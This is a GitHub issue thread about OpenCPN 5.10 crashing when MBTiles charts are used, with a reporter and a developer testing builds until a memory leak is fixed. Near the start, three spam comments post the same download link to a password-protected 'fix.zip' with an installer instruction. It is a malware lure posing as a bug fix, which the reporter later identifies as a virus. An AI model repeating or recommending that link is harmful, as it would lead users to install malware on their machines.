OpenCPN/OpenCPN #4124: MBTile crashes

svMigration, 2024-08-26:
**Describe the bug**
Version 5.10 doesn't handle MBTiles as well as previous releases. One issue is the screen rewrites more slowly and less seamlessly. The bug I am reporting is an actual crash. All I was doing is panning around the screen while using MBTiles. I received a 

MBTiles: Can't create the worker thread 

error in a dialog. When I pressed OK, the program closes and generated a crash report (attached with screenshot of error message).

**To Reproduce**
Steps to reproduce the behavior:
Not sure except to use MBTiles a lot

**Expected behavior**
Normal behavior expected.

**Screenshots**
See zip file

**Desktop (please complete the following information if applicable):**
Edition	Windows 11 Pro
Version	22H2
Installed on	‎4/‎6/‎2023
OS build	22621.4037
Experience	Windows Feature Experience Pack 1000.22700.1027.0

**Additional context**
Other problems with MBTiles in
[CrashReport2024-08-26 1535 Just browsing with MBTiles active.zip](https://github.com/user-attachments/files/16743797/CrashReport2024-08-26.1535.Just.browsing.with.MBTiles.active.zip)
clude the screen freezing. The rest of OpenCPN works. E.g., I can pull up the settings dialogs. I can create a route. But the screen never changes. Chart Groups don't change the screen. The same chart and chart area is displayed and cannot be panned. I can close OCPN normally.  All related to using MBTiles, I believe.

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

esttemanb, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

bdbcat, 2024-08-26:
Do not yet understand the source of the fault when creating an MBtiles worker thread.  Seems pretty unlikely to be a problem with the tile database iteself.  Probably some intermittent system resource limit is reached.
In any case, it seems the best approach is to mark this tile as "temporarily unavailable", rather than summarily exiting OpenCPN with cryptic error message.  In that way, OCPN core will attempt to reload the tile in due course.
I have done that.

svMigration, 2024-08-27:
Hi Dave,
As mentioned above, I seem to be having a lot of problems with MBTiles in 5.10. This goes back to the issues, I believe, we were finding when testing 5.9 (just before I went offline). Do let me know if there is something you'd like me to test to get to the bottom of this.
Cheers,
B

svMigration, 2024-08-27:
BTW, I am not a github expert at all. I only use it for OCPN bug reporting. I was almost screwed by that jerk who put the virus "fix" as soon as I uploaded the bug. Stupid me. Thank goodness for my antivirus software. Thanks for deleting those. Is this a common occurrence?
B

nohal, 2024-08-27:
> BTW, I am not a github expert at all. I only use it for OCPN bug reporting. I was almost screwed by that jerk who put the virus "fix" as soon as I uploaded the bug. Stupid me. Thank goodness for my antivirus software. Thanks for deleting those. Is this a common occurrence? B

We have never seen anything like this before.

bdbcat, 2024-08-27:
I just happened to be sitting here looking at the Issue when they popped up.  Luck happens...

bdbcat, 2024-08-27:
You may like to experiment further with:
https://dl.cloudsmith.io/public/david-register/opencpn-unstable/raw/files/opencpn_5.10.0-0+1944.a993369_setup.exe
This contains the fix described above.
Thanks
Dave

svMigration, 2024-08-27:
OK. I'll download now and spend as much time as I can trying to recreate the problem.
Spotty internet but should be able to report back...
B

svMigration, 2024-08-27:
Had MBTiles displayed and was attempting to import a GPX. While clicking to find the folder in the Open Dialog, OCPN crashed. Report below.
[WhileSelectingGPXFileToImport.zip](https://github.com/user-attachments/files/16766905/WhileSelectingGPXFileToImport.zip)
This was with 5.10.0-0+1944.a993369

svMigration, 2024-08-27:
Another crash. MBTiles displayed. Adjusting waypoints in a route and this:
[image]
OCPN locked up after hitting OK. 
Windows notified OCPN not responded. I selected close program and it did close.

bdbcat, 2024-08-28:
Will you give me source to download some mbtiles comparable toyour setup?
Thanks
Dave

svMigration, 2024-08-28:
Hi Dave,

Here’s my INI file so you can see how the groups are set up and what directories I have loaded.

I almost ALWAYS have a chart group active – not ALL charts visible.

All charts except the NZ BSB charts can be downloaded at TheChartLocker.com.

Let me know if you need more info and I’m happy to help. I have reasonable 4G right now.

Cheers,

B 

 

svMigration.com <https://svmigration.com/> 

 <https://chartlocker.brucebalan.com/> The Chart Locker

 <https://www.lifehack.org/articles/productivity/7-reasons-why-quitting-facebook-now-good-for-your-future.html> Quit Facebook. Disconnect from the net;  <https://www.humanetech.com/> reconnect to the world.

bdbcat, 2024-08-28:
Thanks.  I have been mining the ChartLocker.  A huge resource.  Thanks for that in particular.
I think the issue we are having relates mostly to the IDL (lon 180) crossing questions that we "resolved" earlier.  Working on that logic now.  Definitely trouble happens when IDL is visible on screen at large zoom-out, like for Combined  Pacific Overview in your set.

Does this track with your recent experience?

svMigration, 2024-08-28:
Hi Dave,

It was lon 180 at one point but all the recent problems haven’t had to do with that. Today, for example, I was zoomed in in Tonga at 174 W so 180 wasn’t visible onscreen. (FYI, IDL isn’t 180 around here… IDL is over to the E.)

 

I can’t tell you how many people out here tell me that OpenCPN plus the MBTiles are a game changer for them. It has made such a difference in so many difficult places to sail. They confuse MBTiles from the ChartLocker with OpenCPN and I have to set them straight that I just made some charts but you all made OpenCPN. And they should support OpenCPN as much as possible. So thank you!

 

Let me know what else I can do on this.

Cheers,

B

 

svMigration.com <https://svmigration.com/> 

 <https://chartlocker.brucebalan.com/> The Chart Locker

 <https://www.lifehack.org/articles/productivity/7-reasons-why-quitting-facebook-now-good-for-your-future.html> Quit Facebook. Disconnect from the net;  <https://www.humanetech.com/> reconnect to the world.

bdbcat, 2024-08-28:
Bruce...
Sorry, did not get the .ini file, so not sure of the tiles you typically have loaded.
Anything more than Pacific Overview?

svMigration, 2024-08-28:
Yes lots more. Here it is.
[opencpn.zip](https://github.com/user-attachments/files/16789572/opencpn.zip)

bdbcat, 2024-08-29:
Bruce....
I confess, I cannot make it crash.
I am on Win11, moderate performance machine.  Loaded PacificOverview and Tonga, both as Googlesat images.  I am producing essentially the same image as is posted above for crash during route edit.
According to TaskManager, OpenCPN is using about 300 MBytes.
!5 minutes of dancing around Tonga, zoom in and out aggressively, and no problems.
Can you think of anything that is active on your system that I have not enabled?  Any Comm ports, for instance?  Any other significant apps running, producing memory pressure or CPU/GPU load??

svMigration, 2024-08-29:
Scrolled around for a while, including crossing 180lon. And created another crash.
[Uploading d9f874b3-cbe5-4a08-b917-b2897183d9be.zip…]()

svMigration, 2024-08-29:
Hey Dave,
Let me take some time and look at my setup and see if I can figure out more. Perhaps it is just me...!
B

bdbcat, 2024-08-29:
Bruce...
Another build to test, if you please.
https://dl.cloudsmith.io/public/david-register/opencpn-unstable/raw/files/opencpn_5.10.0-0+1947.f6c708c_setup.exe

svMigration, 2024-08-29:
Hi Dave,
Was doing some planning with that new build. Disabled all plug-ins except object search to make sure no other problems. All close in work with MBTiles in Tonga. Scanning around. Dropping waypoints. Measuring. Making Route. Then Unhandled Unknown Exception error:
[image]
Crash report below.
[d9f874b3-cbe5-4a08-b917-b2897183d9be.zip](https://github.com/user-attachments/files/16806424/d9f874b3-cbe5-4a08-b917-b2897183d9be.zip)

svMigration, 2024-08-29:
Dave, would my Windows settings for Display>Scale have anything to do with this. I have it set to 225%.
B

svMigration, 2024-08-29:
A couple more crashes while scrolling around Tonga. Same exception error but OCPN did not crash. When I tried to close, OCPN froze. Had to kill task. 

Now trying to see if I can figure out a series of actions to create a crash. Will let you know.

svMigration, 2024-08-30:
Hi Dave,
Took a long time but I crashed again with exception. Same as previous post. No idea how I made it happen. Had to kill task. Lots of zooming in and out and panning. I'd do it for a while, then go use another program, come back and do it some more. Can't figure out how to replicate. Will keep trying.
B

svMigration, 2024-08-30:
P.S. OpenCPN is using about 1 GB of memory when I go to task manager to kill the task.
B

bdbcat, 2024-08-30:
b.
Hmmm... I seem to never be able to use more than about 300 MB of memory.
What sort of screen are you using?
Can you think of any other memory consuming elements of OCPN that you are using?  I cannot imagine what the difference is.
When you first start OCPN, what is the memory usage reported by TaskManager?
Does that number increase as you use OCPN, or does it top out at some level (before a crash)?

bdbcat, 2024-08-30:
B...
Do you have decent data connections now?  
Any chance to use AnyDesk so that I could login to your system, and watch you as you crash?

svMigration, 2024-08-30:
> Do you have decent data connections now?
Hi Dave,

Crappy connection now. So that won’t work. But maybe next week. I’ll keep working on this tomorrow and get you the memory info you requested.

Cheers,

B

svMigration, 2024-08-30:
Morning Dave. I spent 15 minutes zooming/panning/switching groups this morning. Could not get that latest build to crash... although it did yesterday. When I opened O it was using just over 300MB memory. As I switched chart groups and zoomed in and out (all the way out), the memory used got bigger and bigger until it was over 1GB. But no crash. Will keep trying. 
I know problems like this are a huge time sink so apologies. 
B
[image]

svMigration, 2024-08-30:
OK. New info.
I left the computer and had breakfast. Came back 20 minutes later. Zoomed in and crash. This time saw there was the "worker thread" message just behind the unhandled exception message (I moved the messages apart for the screen shot. Clicked OK and crashed with a crash report (zip below). This makes some sense to me as when I've had crashes in the past, it has been after OCPN has been running for a while. Often happens on passages when I have it up and running for days. Although with some Windows hibernations or sleeps thrown into the mix. 

[image]
[2723c91b-b4b6-44d8-a1e9-f1e23f2fcac6.zip](https://github.com/user-attachments/files/16821923/2723c91b-b4b6-44d8-a1e9-f1e23f2fcac6.zip)

bdbcat, 2024-09-01:
Bruce...
I did finally succeed in crashing with a similar appearance as your crashes.  As suspected, this turns out to be a memory pressure problem, rather than a memory corruption problem. The good news is we mostly know how to fix that.  So we did, and it looks OK to me so far.

Please give this a try, and let me know how it goes.
https://dl.cloudsmith.io/public/david-register/opencpn-unstable/raw/files/opencpn_5.10.0-0+1951.022dcf7_setup.exe

svMigration, 2024-09-01:
Great news, Dave. I'll try it out.
Thanks,
B

svMigration, 2024-09-02:
Hi Dave,
I tried it out. Seemed better but this evening I got a crash. Report below.
B
[d0e8acf4-22c3-46d3-948a-6c0bd869ab38.zip](https://github.com/user-attachments/files/16833504/d0e8acf4-22c3-46d3-948a-6c0bd869ab38.zip)

svMigration, 2024-09-03:
Hi Dave,

It certainly seems like it happens more when OCPN has been open a while. Wil

Will do the tests.

Cheers

Bruce

svMigration, 2024-09-03:
Dave,
I had OCPN running all day -- including an hour of navigating as we moved anchorages. I went back and forth checking Task Manager. But never saw memory usage more than about 400MB. Late in the day I zoomed out all the way and then switched between chart groups to make OCPN load the MBTiles from the Pacific Overview, plus CM93, plus the NZ BSB raster charts. Then I got an unhandled exception error. Locked up. Had to kill the process. No crash report. As you can see from screen shots, after zooming out and loading the various charts, OCPN was ushing more than 1GB.
Will keep testing.
B
[image]
[image]

svMigration, 2024-09-04:
Dave,
Left OCPN running all day and night. This morning it was using about 800MB. When I tried to use it, after a minute or two of panning around Tonga, the screen locked up. Everything else worked (settings, etc), but no rewrite of the screen when I tried to pan or change chart groups. Program closed properly.
B

bdbcat, 2024-09-05:
Bruce...
One more try, if you please.   Testing this one, I have been unable to drive the TaskManager memory use of OpenCPN past about 350 MBytes, or so.  Lots of zoom/pan action.
We do now understand and have solved an insidious memory leak in tile processing, so I have some confidence here.

https://dl.cloudsmith.io/public/david-register/opencpn-unstable/raw/files/opencpn_5.10.0-0+1957.ad639f6_setup.exe

Thanks
Dave

svMigration, 2024-09-05:
HI Dave,

Glad you found that memory leak. I don’t have a 4G signal today but will be able to download this tomorrow and continue testing.

Cheers,

B

svMigration, 2024-09-05:
Hi Dave,

Was able to download it even on a 3G connection. Played around some and got the Task Manager memory use up to above 1 GB. But no crash or lockup. It went back down to 700MB once I zoomed in. 

 

I’ll keep playing.

B

bdbcat, 2024-09-05:
If possible, could you do a video recording of your "playing around", with TaskManager showing?
I'd like to understand better your environment, and whatever drives memory use.
Thanks
Dave

svMigration, 2024-09-06:
Hi Dave,

Here’s something.

https://www.mediafire.com/file_premium/5gdjyr4qectl1ir/Recording_2024-09-06_125209_small.mp4/file

Sorry for the poor quality. Had to reduce it to upoad.

B

svMigration, 2024-09-06:
Also, I got this message just after I stopped the video.

[image]

bdbcat, 2024-09-06:
Thanks for the video.  Now I understand better.
I do not understand that last pop-up message.  Did OCPN crash soon after that?

Otherwise, I am about ready to declare victory on this, at least for OCPN 5.10.2.
I think you will agree that full Pacific MBtiles (Google SAT + Navionics + ARCGIS plus cm93 plus a large RNC set) is a pretty hefty load for Windows memory manager, especially at full zoom out.
We could imagine purging unused charts or tiles on a group shift.  But we probably would not like that at large scale viewing when, for instance, using keystrokes to investigate/compare cm93 against Google Sat images.  So we don't do that.

Question:  What are the large RNC set you showed in the video?  I've never seen those.

svMigration, 2024-09-06:
Hi Dave,

I definitely agree that having 5 sets of full Pacific is expecting a lot. To be clear, I don’t usually do that kind of full zoom out to get them to load all the tile sets – only during this testing. I’m pretty sure that the crashes I’ve had in the past were not because I did that kind of zooming/switching of charts. But glad that in the end it pointed to the memory problem. Really, really appreciate your diligence in figuring this out.

 

That RNC/BSB set of charts is, I believe, what New Zealand provided about a decade ago. 

 

Cheers,
Bruce

svMigration, 2024-09-06:
>I do not understand that last pop-up message. Did OCPN crash soon after that?

Forgot to answer this. 

No. OCPN did not crash. I was able to close it normally.

B

svMigration, 2024-09-07:
Dave,

We did 2 short sails between anchorages today and OCPN has been open for 2 days. I did a lot of work in other programs as well. I zoomed out a couple of times just to load some tiles and use some memory. It was using about 600MB. Later in the day, after not using it, memory usage was down below 300MB. No crashes or errors.

 

So looks good.

B

transmitterdan, 2024-09-08:
> >I do not understand that last pop-up message. Did OCPN crash soon after that?
> 
> Forgot to answer this. 
> 
> No. OCPN did not crash. I was able to close it normally.
> 
> B
> 
> 

I am coming into this late but there are lots of places that issue messages like this. It's from a library somewhere, not O itself. It's a bit disconcerting that a file management library is creating its own dialog boxes.

svMigration, 2024-09-20:
Hi Dave, 
FYI, I installed 10.2 and have been sailing between many anchorages. Leaving the program open a lot as well. No crashes. Definitely more stable. The big test will be a multi-day passage but that won't come until late October.
Thanks for all the work on that problem.
B

bdbcat, 2024-09-25:
Bruce...
With the latest Release 5.10.2, I think we are done here.
If you agree, please close.

closed 2024-09-25 by svMigration